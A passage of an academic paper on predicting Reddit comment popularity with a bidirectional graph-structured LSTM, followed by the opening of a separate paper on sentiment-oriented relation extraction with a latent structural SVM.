introduce notation for the hierarchical and timing structure. In Figure 2, the nodes in the tree are num- bered in the order that the comments are contributed in time. To characterize graph structure, let π(t) de- note the parent of t and κ(t) its first child. Time structure is represented only among a set of siblings: p(t) is the sibling predecessor in time, and s(t) is the sibling successor. The pointers κ(t), p(t) and s(t) are set to ∅ when t has no child, predecessor, or suc- cessor, respectively. For example, in Figure 2(a), the node t2 will have π(t2) = t1, κ(t2) = t4, p(t2) = ∅ and s(t2) = t3, and the node t3 will have π(t3) = t1, κ(t3) = ∅, p(t3) = t2 and s(t3) = t5. Below we provide the update equations for the forward process, using the subscripts i, f, g, c, and o for the input gate, temporal forget gate, hier- archichal forget gate, cell, and output, respectively. The vectors it, ft, and gt are the weights for new in- formation, remembering old information from sib- lings, and remembering old information from the parent, respectively. σ is a sigmoid function, and ◦ indicates the Hadamard product. If p(t) = ∅, then 123 hp(t) and cp(t) are set to the initial state value. it = σ(Wixt + Uihp(t) + Vihπ(t) + bi) ft = σ(Wfxt + Ufhp(t) + Vfhπ(t) + bf) gt = σ(Wgxt + Ughp(t) + Vghπ(t) + bg) c̃t = Wcxt + Uchp(t) + Vchπ(t) + bc ct = ft ◦ cp(t) + gt ◦ cπ(t) + it ◦ c̃t ot = σ(Woxt + Uohp(t) + Vohπ(t) + bo) ht = ot ◦ tanh(ct) When the whole tree structure is known, we can take advantage of the full response subtree to bet- ter represent the node state. To that end, we define a backward LSTM that has a similar set of update equations except that only the first child will pass the hidden state to its parent. Specifically, the update equations are the same except that π(t) is replaced with κ(t), p(t) is replaced with s(t), and a different set of weight matrices and bias vectors are learned. Let + and − indicate forward and backward em- beddings respectively. On top of the LSTM unit, the forward and backward state vectors are concatenated and passed to a softmax layer to predict 8 quantized karma levels: P(yt = j|x,h) = exp(W j s [h + t ;h − t ])∑8 k=1 exp(W k s [h + t ;h − t ]) where x and h correspond to the set of input features and state vectors (respectively) for all nodes in the discussion. 2.2 Input Features The full model includes two types of features in the input vector, including non-textual features associ- ated with the submission context and the textual fea- tures of the comment at that node. The submission context features are extracted from the graph and metadata associated with the comment, motivated by prior work showing that context factors such as the forum, timing and au- thor of a post are very useful in predicting popular- ity. The submission context features include: • Timing: time since root, time since parent (in hours), number of later comments, and number of previous comments • Author: a binary indicator as to whether the au- thor is the original poster, and number of com- ments made by the author in the conversation • Graph-location: depth of the comment (dis- tance from the root), and number of siblings • Graph-response: number of children (direct replies to the comment), height of the sub- tree rooted from the node, size of that subtree, number of children normalized for each thread (2 normalization techniques), subtree size nor- malized for each thread (2 normalization tech- niques). Two methods are used to normalize the subtree size and number of children to compensate for variation associated with the size of the discussion, specif- ically: i) subtract the mean feature value in the thread, and ii) divide by the square root of the rank of the feature value in the thread. These features are a superset of those used in Fang et al. (2016). The subvector including all these fea- tures is denoted xst . The comment text features, denoted xct, are gen- erated using a simple average bag-of-words repre- sentation learned during the training: xct = 1 N N∑ i=1 W ie where W ie is an embedding of the i-th word in the comment, and N is the number of words in the comment. Comments longer than 100 words were truncated to reduce noise associated with long com- ments, assuming that the early portion carries the most information. The percentage of the comments that exceed 100 words is around 11%−14% for the subreddits used in the study. In all experiments, the word embedding dimension is d = 100, and the vo- cabulary includes only words that occurred at least 10 times in the dataset. The input vector xt is set to either xst or [x s t;x c t], depending on whether the experiment uses text. 2.3 Pruning Often the number of comments in a single subtree can be large, which leads to high training costs. A large percentage of the comments are low karma and 124 minimally relevant for predicting karma of neigh- bors, and many can be easily identified with simple graph and timing features (e.g. having no replies or contributed late in the discussion). Therefore, we introduce a preprocessing step that identifies com- ments that are highly likely to be low karma to de- crease the computation cost. We then assign these nodes to be level 0 and prune them out of the tree, but retain a count of nodes pruned for use in a count- weighted bias term in the update to capture informa- tion about response volume. For detecting low karma comments, we train a simple SVM classifier to identify comments at the 0 karma level based on the submission context fea- tures. If a pruned comment leads to a disconnected graph (e.g., an internal node is pruned but not its children), then the comment is retained in the tree. In testing, all pruned comments are given a predicted level of 0 and accounted for in the evaluation. The state updates have an additional bias term for any nodes that have subsequent sibling or children comments pruned. For example, consider Figure 2, if nodes {t5, t6, t7, t9} are pruned, then t8 will have a modified forward update, and t3, t4 will have a modified backwards update. At node t, define Mκt to be the number of levels pruned below it, Mpt as the number of immediately preceeding comments pruned in its subgroup (responding to the same par- ent), and Mst as the number of subsequent comments pruned in its subgroup plus the non-initial comments in the associated subtrees. In the example above, Mκ3 = 1, M s 3 = 2, M s 4 = 1, M p 8 = 1, and all other M∗t = 0. The pointers are updated reflect the structure of the pruned tree, so p(8) = 4, s(4) = 8, s(3) = ∅. The bias vectors rκ, rp and rs are as- sociated with the different sets of nodes pruned. Let + and − indicate forward and backward em- beddings, respectively. The forward update has an adjusted predecessor contribution (h+ p(t) + M p t rp). The backward update adds Mst rs + M κ t rκ to either h− s(t) or h− κ(t) , depending on whether it is a time or hierarchical update, respectively. 2.4 Training The objective function is minimum cross-entropy over the quantized levels. All model parame- ters are jointly trained using the adadelta optimiza- tion algorithm (Zeiler, 2012). Word embeddings subreddit comments threads vocab size askwomen 0.8M 3.5K 32K askmen 1.1M 4.5K 35K politics 2.2M 4.9K 55K Table 1: Data statistics. subreddit Prec Rec % pruned askwomen 67.9 72.4 36.9 askmen 60.1 75.3 36.1 politics 49.6 60.3 47.5 Table 2: Precision and recall of the pruning classifier and percentage of comments pruned. are initialized using word2vec skip-gram embed- dings (Mikolov et al., 2013) trained on all com- ments from the corresponding subreddit. The code is implemented in Theano (Team et al., 2016) and is available at https://github. com/vickyzayats/graph-LSTM.We tune the model over different dimensions of the LSTM unit, and use the performance on the development set as a stopping criteria for the training. 3 Experiments 3.1 Data Reddit2 is a popular discussion forum platform con- sisting of a large number of subreddits focusing on different topics and interests. In our study, we exper- imented with 3 subreddits: askwomen, askmen, and politics. All the data consists of discussions made in the period between January 1, 2014 and January 31, 2015. Table 1 shows the total amount of data used for each of the subreddits. For each subreddit, the threads were randomly distributed between training, development (dev) and test sets with the proportions of 6:2:2. The performance of the pruning classifier on the dev set is presented in Table 2. 3.2 Task and Evaluation Metrics Reddit karma has a Zipfian distribution, highly skewed toward the low-karma comments. Since the rare high karma comments are of greatest interest in popularity prediction, Fang et al. (2016) proposes a 2https://reddit.com 125 task of predicting quantized karma (using a nonlin- ear head-tail break rule for binning) with evaluation using a macro average of the F1 scores for predict- ing whether a comment exceeds each different level. Experiments reported here use this framework. Specifically, all the comments with karma lower than 1 are assigned to level 0, and each subsequent level corresponds to karma less than or equal to the median karma in the rest of the comments based on the training data statistics. Each subreddit has 8 quantized karma levels based on its karma distribu- tion. There are 7 binary subtasks (does the comment have karma at level j or higher for j = 1, . . . ,7), and the scoring metric is the macro average of F1(j). For tuning hyperparameters and as a stopping cri- terion, we use a linearly weighted average of F1 scores to increase the weight on high karma com- ments, which gives slightly better performance for the high karma cases but has only a small effect on the macro average. 3.3 Baseline and Contrast Systems We compare the graph LSTM to a node-independent baseline, which is a feedforward neural network model consisting of input, hidden and softmax lay- ers. This model is a simplification of the graph- LSTM model where there is no connection between nodes. The node-independent model characterizes a comment without reference to either the text of the comment that it is responding to or the comments reacting to it. However, the model does have in- formation on the size of the response subtree via the submission context input features. Both node- independent and graph-structured models are trained with the same cost function and tuned over the same set of hidden layer dimensions. We contrast performance of both architectures with and without using the text of the comment it- self. As shown in Fang et al. (2016), simply us- ing submission context features (graph, timing, au- thor) gives a strong baseline. In order to evaluate the role of each direction (forward or backward) in the graph-structured model, we also present re- sults using only the forward direction graph-LSTM for comparison to the bidirectional model. In addi- tion, in order to evaluate the importance of the lan- guage of the comment itself vs. the language used in the rest of the tree, we perform an interpolation Model Text askwomen askmen politics indep no 53.2 48.3 46.6 graph no 54.6 52.1 47.9 indep yes 52.8 50.7 47.4 interp mix 54.7 52.1 48.2 graph(f) yes 55.0 53.3 49.9 graph yes 56.4 54.8 50.4 Table 3: Average F1 score of karma level prediction for node-independent (indep) vs. graph-structured (graph) models with and without text features; interp corresponds to an interpolation of the graph-structured model with- out text and the node-independent model with text; and graph(f) corresponds to a graph-structured model con- tains forward direction only. between the graph-LSTM with no language features and the node-independent model with language fea- tures. The relative weight for the two models is tuned on the development set. 3.4 Karma Level Prediction The results for the average F1 scores on the test set are presented in Table 3. In experiments for all the subreddits, graph-structured models outperform the corresponding node-independent models both with and without language features. Language features also give a greater performance gain when used in the graph-LSTM models. The fact that the forward graph improves over the interpolated models shows that it is not simply the information in the current node that matters for karma of that node. Finally, while the full model outperforms the forward-only version for all the subreddits, the gain is smaller than that obtained by the forward direction alone over the node-independent model, so the forward direction seems to be more important. The karma prediction results (F1 score) at the dif- ferent levels is shown in Figure 3. While in askmen and askwomen subreddits the overall performance decreases for higher levels, the politics subreddit has an opposite trend. This may be due in part to the lower pruning recall in the politics subreddit, but Fang et al. (2016) also observe higher performance for high karma levels in the politics subreddit. 126 Figure 3: F1 scores as a function of the quantized levels for different model configuration. 4 Analysis Here, we present analyses aimed at better under- standing the behavior of the graph-structured model and the role of language in prediction. All analyses are performed on the development set. The anal- yses are motivated by considering possible scenar- ios that are exceptions to the easy cases, which are: i) comments that are contributed early in the discus- sion and spawn large subtrees, likely to have high karma, and ii) comments with small subtrees that typically have low karma. We hypothesized three scenarios where the bidirectional graph-LSTM with text might be useful. One case is controversial com- ments, which have large subtrees but do not have high karma because of downvotes; these tend to have overprediction of karma when using only submis- sion context. The other two scenarios involve un- derprediction of karma when using only submission context. Early comments associated with few chil- dren and a more narrow subtree (see the downward chain in Figure 1) may spawn popular new threads and benefit from the popularity of other comments in the thread (more readers attracted), thus having higher popularity than the number of children sug- gests. Lastly, comments that are clever or humor- ous discussion endpoints might have high popularity but small subtrees. These two cases tend to differ in their relative timing in the discussion. 4.1 Karma Prediction vs. Time The first study looked at where the graph-LSTM provides benefits in terms of timing. We plot the average F1 score as a function of the contribution time in Figure 4. As an approximation for time, we use the quantized number of comments made prior to the current comment. The plots show that the graph-structured model improves over the node- independent model throughout the discussion. Rel- ative gains are larger towards the end of discussions where the node-independent performance is lower. A similar trend is observed when plotting average F1 as a function of depth in the discussion tree. While the use of text in the graph-LSTM seems to help throughout the discussion, we hypothesized that there would be different cases where it might help, and these would occur at different times. In- deed, 93% of the comments that are overpredicted 127 Figure 4: Average F1 scores as a function of time, approximated using the number of previous comments quantized in increments of 20. by more than 2 levels by the node-independent model without text (controversial comments) occur in the first 20% of the discussion. Comments that are underpredicted by more than 2 occur throughout the discussion and are roughly uniform (13-19%) over the first half of the discussion, but then quickly ramp down. High-karma comments are rare at the end of the discussion; less than 5% of the underpredicted comments are in the last 30%. 4.2 Importance of Responses In order to see how the model benefits from using the language cues in underpredicted and overpredicted scenarios, we look at the size of errors made by the graph-LSTM model with and without text features. In Figure 5, the x-axis indicates the error between the actual karma level and the karma level predicted by the graph-LSTM using submission context fea- tures only. The negative errors represent the over- predicted comments, and the positive errors repre- sent the underpredicted comments. The y-axis rep- resents the average error between the actual karma level and the karma level predicted by the model using both submission context and language fea- tures.The x=y identity line corresponds to no benefit from language features. Results are presented for the politics subreddit; other subreddits have similar trends but smaller differences for the underpredicted cases. We compare two models – bidirectional and for- ward direction graph-structured LSTM – in order to understand the role of the language of the replies vs. the comment and its history. We find that, for the bidirectional graph-LSTM model, language is help- ing identify overpredicted cases more than underpre- dicted ones. The forward direction model also out- performs the node-independent model, but has less benefit in overpredicted cases, consistent with our intuition that controversy is identifiable based on the responses. Although the comment text input is sim- ply a bag of words, it can capture the mixed senti- ment of the responses. While it is not represented in the plot, larger er- rors are much less frequent. Looking at average F1 as a function of the number of children (direct responses), we found that the graph-LSTM mainly benefits nodes that have a small number of children, consistent with the two underprediction scenarios hypothesized. However, many underpredicted cases are not impacted, since errors due to pruning con- tribute to 15-40% of the underpredicted cases, de- pending on the subreddit (highest for politics). This explains the smaller gains for the positive side of Figure 5. 4.3 Language Use Analysis To provide insights into what the model is learning about language, we looked at individual words asso- ciated with different categories of comments, as well as examples of the different error cases. For the word level analysis, we classified words in two different ways, again using the politics sub- reddit. First, we associate words in comments with zero or positive karma. For each word in the vocab- ulary, we calculate the probability of a single-word comment being level zero using the trained model with a simplified graph structure (a post and a com- ment) where all the inputs were set to zero except the comment text. The lists of positive-karma and zero- karma correspond to the 300 words associated with the lowest and highest probability of zero-karma, re- spectively. We identified 300 positive-karma and zero-karma reply words in a similar fashion, using a simplified graph with individual words us as inputs 128 Figure 5: The error between the actual karma level and the karma level predicted by the model using both submission context and language features. Negative errors correspond to over-prediction; positive errors correspond to under- prediction. for the reply while predicting the comment karma. Second, we identified words that may be indica- tive of comments that are over- and underpredicted by the graph-structured model without text and for which the graph-LSTM model with text reduced the error by more than 2 levels. Specifically, we choose those words w in comments having the highest ratio r = p(w|t)/p(w), where t indicates an over- or un- derpredicted comment, subject to minimum occur- rence constraints (5 for overpredicted comments, 15 for underpredicted comments). The 50 words with the highest ratio were chosen for each case and any words in both over- and underpredicted sets were eliminated, leaving 47 words. Again, this was re- peated for words in replies to over vs. underpre- dicted comments, but with a minimum count thresh- old of 20, resulting in 45 words. The lists are noisy, similar to what is often found with the topic model, and colored by the language of the subreddit community, but a few trends can be observed. Looking at the list of words associated with replies to positive-karma comments we noticed words that indicate humor (“LOL”, “hilarious”), positive feedback (“Like”, “Right”), and emotion in- dicators (“!!”, swearing). Words in comments and replies associated with overpredicted (controversial) cases are related to controversial topics (sexual, reg- ulate, liberals), named political parties, and men- tions of downvoting or indication that the comment has been edited with the word “Edit.” Since the two sets of lists were generated sepa- rately, there are words in the over/under-predicted lists that overlap with the zero/non-zero karma lists (12 in the reply lists, 20 in the comment lists). The majority of the overlap (26/32 words) is consistent Figure 6: The mapping of the words in the comments to the shared space using t-SNE in politics subred- dit. Shown are the words that are highly associated with positive-karma, negative-karma, underpredicted and overpredicted comments. with the intuition that words on the underpredicted list should be associated with positive-karma, and words on the overpredicted list might overlap with the zero-karma list. Rather than providing word lists, many neural net- work studies illustrate trends using word embed- ding visualization. The embeddings of the words from the union of lists for positive-karma, zero- karma, underpredicted and overpredicted comments and replies were together used to learn a t-SNE map- ping. The results are plotted for comments in Fig- ure 6, which shows that the words that are as- sociated with underpredicted comments (red) are aligned with positive-karma words (green) for both comment text and text in replies. Words associated 129 with overpredicted comments (blue) are more scat- tered, but they are somewhat more like the zero- karma words (yellow). The trends for words in replies are similar. Table 4 lists examples of the different error sce- narios with the reference karma and predictions of different models (node-independent without text, feedforward graph-LSTM with text, and the full biLSTM). The first two examples are overpredicted (controversial) cases, where ignoring text leads to a high karma prediction, but the reference is zero. In the first case, the forward model incorrectly predicts high karma because “Republican” tends to be asso- ciated with positive karma. The model leveraging reply text correctly predicts the low karma. In the second case, the forward model captures reduces the prediction, but again having the replies is more help- ful. The next two cases are examples of underpredic- tion due to small subtrees. Example 3 is incorrectly labeled as level 0 by the forward and no-text models, but because the responses mention “nice joke” and “accurate analogy,” the bidirectional model is able to identify it as level 7. Example 4 has only one child, but both models using language correctly pre- dict level 7, probably because the model has learned that references to “Colbert” are popular. The next two examples are underpredicted cases from early in the discussion, many of which expressed an opin- ion that in some way provided multiple perspectives. Finally, the last two examples represent instances where neither model successfully identifies a high karma comment, which often involve analogies. Un- like the “titanic” analogy, these did not have suffi- cient cues in the replies. 5 Related Work The problem of predicting popularity in social me- dia platforms has been the subject of several studies. Popularity as defined in terms of volume of response has been explored for shares on Facebook (Cheng et al., 2014) and Twitter (Bandari et al., 2012) and Twitter retweets (Tan et al., 2014; Zhao et al., 2015; Bi and Cho, 2016). Studies on Reddit predict karma as popularity (Lakkaraju et al., 2013; Jaech et al., 2015; He et al., 2016) or as community endorsement (Fang et al., 2016). Popularity prediction is a diffi- cult task where many factors can play a role, which is why most prior studies control for specific factors, including topic (Tan et al., 2014; Weninger et al., 2013), timing (Tan et al., 2014; Jaech et al., 2015), and/or comment content (Lakkaraju et al., 2013). Controlling for specific factors is useful in under- standing the components of a successful post, but it does not reflect a realistic scenario. Studies that do not include such constraints have looked at Twitter retweets (Bi and Cho, 2016) and Reddit karma (He et al., 2016; Fang et al., 2016). The work in (He et al., 2016) uses reinforcement learning to identify popular threads to track given the past comment history, so it is learning language cues relevant to high karma but it does not explicitly predict karma. In addition, it models relevance via an inner-product of past and new comment embed- dings, and uses an LSTM to model inter-comment dependencies among a collection of comments irre- spective of their sibling-parent relationship, whereas the LSTM in our work is over a graph that accounts for this relationship. The work most closely related to our study is Fang et al. (2016). The node-independent baseline im- plemented in our study is equivalent to their feed- forward network baseline, but the results are not di- rectly comparable because of differences in training (we use more data) and input features. The most im- portant difference in our approach is the representa- tion of textual context using a bidirectional graph- LSTM, including the history behind and responses to a comment. Other differences are: i) Fang et al. (2016) use an LSTM to characterize comments, while our model uses a simple bag-of-words ap- proach, and ii) they learn latent submission context models to determine the relative importance of tex- tual cues, while our approach uses a submission con- text SVM to prune low karma comments (ignoring their text). Allowing for differences in baselines, we note that the absolute gain in performance from us- ing text features is larger for our model, which rep- resents language context. Tree LSTMs are a modification of sequential LSTMs that have been proposed for a variety of sentence-level NLP tasks (Tai et al., 2015; Zhu et al., 2015; Zhang et al., 2016; Le and Zuidema, 2015). The architecture of tree LSTMs varies depending on the task. Some options include summarizing over the children, adding a separate forget gate for each 130 Ex karma Comment 1 0 7 7 0 Republicans are fundamentally dishonest. (politics, id:1x9pcx) 2 0 7 4 0 That is rape. She was drunk and could not consent. Period. Any of the supposed evidence otherwise is nothing but victim blaming. (askwomen, id:2h8pyh) 3 7 0 0 7 The liberals keep saying the titanic is sinking but my side is 500 feet in the air. (politics, id:1upfgl) 4 7 3 7 7 I miss your show, Stephen Colbert. (askmen, id:2qmpzm) 5 7 3 7 7 that is terrifying. they were given the orders to bust down the door without notice to the residents, thereby placing themselves in danger. and ultimately, placing the lives of the residents in danger (who would be acting out of fear and self-defense) (politics, id:1wzwg6) 6 7 0 5 6 It’s something, and also would change the way that Police unions and State Prosecutors work. I don’t fundamentally agree with the move, since it still necessitates abuse by the State, but it’s something. (politics, id:27chxr) 7 6 0 0 0 Chickenhawks always talk a big game as long as someone else is doing the fighting. (poli- tics, id:1wbgpd) 8 6 0 0 0 [They] use statistics in the same way that a drunk uses lampposts: for support, rather than illumination. -Andrew Lang. (politics, id:1yc2fj) Table 4: Example comments and karma level predictions: reference, no text, graph(f), graph. child (Tai et al., 2015), recurrent propagation among siblings (Zhang et al., 2016), or use of stack LSTMs (Dyer et al., 2015). Our work differs from these studies in two respects: the tree structure here char- acterizes a discussion rather than a single sentence; and our architecture incorporates both hierarchical and temporal recursions in one LSTM unit. 6 Conclusion In summary, this paper presents a novel approach for modeling threaded discussions on social media using a graph-structured bidirectional LSTM which represents both hierarchical and temporal conversa- tion structure. The propagation of hidden state in- formation in the graph provides a mechanism for representing contextual language, including the his- tory that a comment is responding to as well as the ensuing discussion it spawns. Experiments on Reddit discussions show that the graph-structured LSTM leads to improved results in predicting com- ment popularity compared to a node-independent model. Analyses show that the model benefits pre- diction over the extent of the discussion, and that language cues are particularly important for distin- guishing controversial comments from those that are very positively received. Responses from even a small number of comments seem to be useful, so it is likely that the bidirectional model would still be useful with a short-time lookahead for early predic- tion of popularity. While we evaluate the model on predicting the popularity of comments in specific forums on Red- dit, it can be applied to other social media platforms that maintain a threaded structure or possibly to ci- tation networks. In addition to popularity predic- tion, we expect the model would be useful for other tasks for which the responses to comments are in- formative, such as detecting topic or opinion shift, influence or trolls. With the more fine-grained feed- back increasingly available on social media plat- forms (e.g. laughter, love, anger, tears), it may be possible to distinguish different types of popularity as well as levels, e.g. shared sentiment vs. humor. In this study, the model uses a simple bag-of- words representation of the text in a comment; more sophisticated attention-based models and/or feature engineering may improve performance. In addition, performance of the model on underpredicted com- ments appears to be limited by the pruning mecha- nism that we introduced. It would be useful to ex- plore the tradeoffs of reducing the amount of prun- ing vs. using a more complex classifier for prun- ing. Finally, it would be useful to evaluate per- formance using a short window lookahead for re- sponses, rather than the full discussion tree. 131 Acknowledgments This paper is based on work supported by the DARPA DEFT Program. Views expressed are those of the authors and do not reflect the official policy or position of the Department of Defense or the U.S. Government. We thank the reviewers for their help- ful feedback. References Roja Bandari, Sitaram Asur, and Bernardo Huberman. 2012. The pulse of news in social media: Forecast- ing popularity. In Proc. ICWSM. Bin Bi and Junghoo Cho. 2016. Modeling a retweet network via an adaptive bayesian approach. In Proc. WWW. Justin Cheng, Lada Adamic, P. Alex Dow, Jon Michael Kleinberg, and Jure Leskovec. 2014. Can cascades be predicted? In Proc. WWW. Chris Dyer, Adhiguna Kuncoro, Miguel Ballesteros, and Noah A. Smith. 2015. Recurrent neural network grammars. In Proc. NAACL. Hao Fang, Hao Cheng, and Mari Ostendorf. 2016. Learning latent local conversation modes for predict- ing community endorsement in online discussions. In Proc. SocialNLP. Ji He, Mari Ostendorf, Xiaodong He, Jianshu Chen, Jian- feng Gao, Lihong Li, and Li Deng. 2016. Deep reinforcement learning with a combinatorial action space for predicting popular Reddit threads. In Proc. EMNLP. Aaron Jaech, Victoria Zayats, Hao Fang, Mari Ostendorf, and Hannaneh Hajishirzi. 2015. Talking to the crowd: What do people react to in online discussions? In Proc. EMNLP. Himabindu Lakkaraju, Julian J. McAuley, and Jure Leskovec. 2013. What’s in a name? Understanding the interplay between titles, content, and communities in social media. In Proc. ICWSM. Phong Le and Willem Zuidema. 2015. Compositional distributional semantics with long short term memory. In Proc. *SEM. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013. Efficient estimation of word represen- tations in vector space. In Proc. ICLR. Kai Sheng Tai, Richard Socher, and Christopher D Man- ning. 2015. Improved semantic representations from tree-structured long short-term memory networks. In Proc. ACL. Chenhao Tan, Lillian Lee, and Bo Pang. 2014. The ef- fect of wording on message propagation: Topic- and author-controlled natural experiments on twitter. In Proc. ACL. The Theano Development Team, Rami Al-Rfou, Guil- laume Alain, Amjad Almahairi, Christof Anger- mueller, Dzmitry Bahdanau, Nicolas Ballas, Frédéric Bastien, Justin Bayer, Anatoly Belikov, et al. 2016. Theano: A python framework for fast computa- tion of mathematical expressions. arXiv preprint arXiv:1605.02688. Trang Tran and Mari Ostendorf. 2016. Characterizing the language of online communities and its relation to community recognition. In Proc. EMNLP. Tim Weninger, Xihao Avi Zhu, and Jiawei Han. 2013. An exploration of discussion threads in social news sites: A case study of the Reddit community. In Proc. ASONAM. Matthew D Zeiler. 2012. Adadelta: an adaptive learning rate method. arXiv preprint arXiv:1212.5701. Xingxing Zhang, Liang Lu, and Mirella Lapata. 2016. Top-down tree long short-term memory networks. In Proc. NAACL. Qingyuan Zhao, Murat A Erdogdu, Hera Y He, Anand Rajaraman, and Jure Leskovec. 2015. Seismic: A self-exciting point process model for predicting tweet popularity. In Proc. SIGKDD. Xiaodan Zhu, Parinaz Sobhani, and Hongyu Guo. 2015. Long short-term memory over recursive structures. In Proc. ICML. 132 work_m77zzbb2kfbtxcgjfd5pecfqra ---- Senti-LSSVM: Sentiment-Oriented Multi-Relation Extraction with Latent Structural SVM Lizhen Qu Max Planck Institute for Informatics lqu@mpi-inf.mpg.de Yi Zhang Nuance Communications yi.zhang@nuance.com Rui Wang DFKI GmbH mars198356@hotmail.com Lili Jiang Max Planck Institute for Informatics ljiang@mpi-inf.mpg.de Rainer Gemulla Max Planck Institute for Informatics rgemulla@mpi-inf.mpg.de Gerhard Weikum Max Planck Institute for Informatics weikum@mpi-inf.mpg.de Abstract Extracting instances of sentiment-oriented re- lations from user-generated web documents is important for online marketing analysis. Un- like previous work, we formulate this extrac- tion task as a structured prediction problem and design the corresponding inference as an integer linear program. Our latent structural SVM based model can learn from training cor- pora that do not contain explicit annotations of sentiment-bearing expressions, and it can si- multaneously recognize instances of both bi- nary (polarity) and ternary (comparative) re- lations with regard to entity mentions of in- terest. The empirical evaluation shows that our approach significantly outperforms state- of-the-art systems across domains (cameras and movies) and across genres (reviews and forum posts). The gold standard corpus that we built will also be a valuable resource for the community. 1 Introduction Sentiment-oriented relation extraction (Choi et al., 2006) is concerned with recognizing sentiment po- larities and comparative relations between entities from natural language text. Identifying such rela- tions often requires syntactic and semantic analysis at both sentence and phrase level. Most prior work on sentiment analysis consider either i) subjective sentence detection (Yu and Kübler, 2011), ii) po- larity classification (Johansson and Moschitti, 2011; Wilson et al., 2005), or iii) comparative relation identification (Jindal and Liu, 2006; Ganapathib- hotla and Liu, 2008). In practice, however, differ- ent types of sentiment-oriented relations frequently coexist in documents. In particular, we found that more than 38% of the sentences in our test corpus contain more than one type of relations. The iso- lated analysis approach is inappropriate because i) it sacrifices acuracy by ignoring the intricate interplay among different types of relations; ii) it could lead to conflicting predictions such as estimating a relation candidate as both negative and comparative. There- fore, in this paper, we identify instances of both sen- timent polarities and comparative relations for enti- ties of interest simultaneously. We assume that all the mentions of entities and attributes are given, and entities are disambiguated. It is a widely used as- sumption when evaluating a module in a pipeline system that the outputs of preceding modules are error-free. To the best of our knowledge, the only exist- ing system capable of extracting both comparisons and sentiment polarities is a rule-based system pro- posed by Ding et al. (2009). We argue that it is better to tackle the task by using a unified model with structured outputs. It allows us to consider a set of correlated relation instances jointly and char- acterize their interaction through a set of soft and hard constraints. For example, we can encode con- straints to discourage an attribute to participate in a polarity relation and a comparative relation at the same time. As a result, the system extracts a set of correlated instances of sentiment-oriented relations from a given sentence. For example, with the sen- tence about the camera Canon 7D, “The sensor is great, but the price is higher than Nikon D7000.” the expected output is positive(Canon 7D, sensor) 155 Transactions of the Association for Computational Linguistics, 2 (2014) 155–168. Action Editor: Janyce Wiebe. Submitted 6/2013; Revised 11/2013; Published 4/2014. c©2014 Association for Computational Linguistics. and preferred(Nikon D7000, Canon 7D, textit- price). However, constructing a fully annotated train- ing corpus for this task is labor-intensive and re- quires strong linguistic background. We minimize this overhead by applying a simplified annotation scheme, in which annotators mark mentions of en- tities and attributes, disambiguate the entities, and label instances of relations for each sentence. Based on the new scheme, we have created a small Senti- ment Relation Graph (SRG) corpus for the domains of cameras and movies, which significantly differs from the corpora used in prior work (Wei and Gulla, 2010; Kessler et al., 2010; Toprak et al., 2010; Wiebe et al., 2005; Hu and Liu, 2004) in the follow- ing ways: i) both sentiment polarities and compar- ative relations are annotated; ii) all mentioned en- tities are disambiguated; and iii) no subjective ex- pressions are annotated, unless they are part of entity mentions. The new annotation scheme raises a new chal- lenge for learning algorithms in that they need to automatically find textual evidences for each anno- tated relation during training. For example, with the sentence “I like the Rebel a little better, but that is another price jump”, simply assigning a sentiment- bearing expression to the nearest relation candidate is insufficient, especially when the sentiment is not explicitly expressed. In this paper, we propose SENTI-LSSVM, a latent structural SVM based model for sentiment-oriented relation extraction. SENTI-LSSVM is applied to find the most likely set of the relation instances expressed in a given sentence, where the latent variables are used to assign the most appropriate textual evidences to the respective instances. In summary, the contributions of this paper are the following: • We propose SENTI-LSSVM: the first unified sta- tistical model with the capability of extracting instances of both binary and ternary sentiment- oriented relations. • We design a task-specific integer linear pro- gramming (ILP) formulation for inference. • We construct a new SRG corpus as a valuable asset for the evaluation of sentiment relation extraction. • We conduct extensive experiments with on- line reviews and forum posts, showing that SENTI-LSSVM model can effectively learn from a training corpus without explicitly annotated subjective expressions and that its performance significantly outperforms state-of-the-art sys- tems. 2 Related Work There are ample works on analyzing sentiment po- larities and entity comparisons, but the majority of them studied the two tasks in isolation. Most prior approaches for fine-grained sentiment analysis focus on polarity classification. Super- vised approaches on expression-level analysis re- quire the annotation of sentiment-bearing expres- sions as training data (Jin et al., 2009; Choi and Cardie, 2010; Johansson and Moschitti, 2011; Yessenalina and Cardie, 2011; Wei and Gulla, 2010). However, the corresponding annotation pro- cess is time-consuming. Although sentence-level annotations are easier to obtain, the analysis at this level cannot cope with sentences conveying relations of multiple types (McDonald et al., 2007; Täckström and McDonald, 2011; Socher et al., 2012). Lexicon- based approaches require no training data (Ku et al., 2006; Kim and Hovy, 2006; Godbole et al., 2007; Ding et al., 2008; Popescu and Etzioni, 2005; Liu et al., 2005) but suffer from inferior performance (Wil- son et al., 2005; Qu et al., 2012). In contrast, our method requires no annotation of sentiment-bearing expressions for training and can predict both senti- ment polarities and comparative relations. Sentiment-oriented comparative relations have been studied in the context of user-generated dis- course (Jindal and Liu, 2006; Ganapathibhotla and Liu, 2008). Approaches rely on linguistically moti- vated rules and assume the existence of independent keywords in sentences which indicate comparative relations. Therefore, these methods fall short of ex- tracting comparative relations based on domain de- pendent information. Both Johansson and Moschitti (2011) and Wu et al. (2011) formulate fine-grained sentiment analy- sis as a learning problem with structured outputs. However, they focus only on polarity classification 156 of expressions and require annotation of sentiment- bearing expressions for training as well. While ILP has been previously applied for infer- ence in sentiment analysis (Choi and Cardie, 2009; Somasundaran and Wiebe, 2009; Wu et al., 2011), our task requires a complete ILP reformulation due to 1) the absence of annotated sentiment expressions and 2) the constraints imposed by the joint extrac- tion of both sentiment polarity and comparative re- lations. 3 System Overview This section gives an overview of the whole system for extracting sentiment-oriented relation instances. Prior to presenting the system architecture, we in- troduce the essential concepts and the definitions of two kinds of directed hypergraphs as the represen- tation of correlated relation instances extracted from sentences. 3.1 Concepts and Definitions Entity. An entity is an abstract or concrete thing, which needs not be of material existence. An entity in this paper refers to either a product or a brand. Attribute. An attribute is an object closely associ- ated with or belonging to an entity, such as the lens of digital camera. Sentiment-Oriented Relation. A sentiment- oriented relation is either a sentiment polarity or a comparative relation, defined on tuples of entities and attributes. A sentiment polarity relation conveys either a positive or a negative attitude towards enti- ties or their attributes, whereas a comparative rela- tion indicates the preference of one entity over the other entity w.r.t. an attribute. Relation Instance. An instance of sentiment polar- ity takes the form r(entity, attribute) with r ∈ {pos- itive, negative}, such as positive(Canon 7D, sen- sor). The polarity instances expressed in the form of unary relations, such as “Nikon D7000 is ex- cellent.”, are denoted as binary relations r(entity, whole), where the attribute whole indicates the en- tity as a 